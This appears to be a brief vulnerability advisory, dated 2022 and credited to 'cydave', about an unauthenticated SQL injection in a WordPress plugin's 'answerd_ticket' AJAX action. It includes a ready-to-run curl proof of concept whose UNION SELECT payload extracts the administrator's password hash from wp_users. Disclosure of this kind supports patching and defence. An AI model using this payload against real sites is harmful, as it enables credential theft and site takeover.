The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection
curl https://example.com/wp-admin/admin-ajax.php --data 'action=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,(SELECT user_pass FROM wp_users WHERE ID = 1),NULL,NULL,NULL,NULL,NULL-- -'
cydave
cydave
Yes
2022-05-02 (about 1 years ago)
2022-05-02 (about 1 years ago)
2022-05-02 (about 1 years ago)